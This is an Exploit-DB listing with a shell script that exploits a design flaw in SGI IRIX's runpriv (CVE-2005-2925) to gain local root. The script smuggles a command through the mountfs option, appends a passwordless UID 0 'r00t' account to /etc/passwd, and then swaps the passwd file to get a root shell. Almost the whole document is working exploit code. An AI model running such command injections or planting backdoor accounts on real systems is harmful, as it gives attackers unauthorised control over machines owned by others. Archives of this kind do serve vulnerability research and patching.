SGI IRIX <= 6.5.28 - runpriv Design Error Vulnerability

2005-10-10T00:00:00
ID EDB-ID:1577
Type exploitdb
Reporter N/A
Modified 2005-10-10T00:00:00

Description

SGI IRIX <= 6.5.28 (runpriv) Design Error Vulnerability. CVE-2005-2925. Local exploit for irix platform

                                        
                                            #!/bin/sh
# Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312

/usr/sysadm/bin/runpriv mountfs -s test -d / -o |
  "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh &gt;&gt; /etc/passwd'"
su r00t -c "chown root:sys /tmp/passwd123 ;
mv /tmp/passwd123 /etc/passwd ;
chmod 644 /etc/passwd ; su" 

# milw0rm.com [2005-10-10]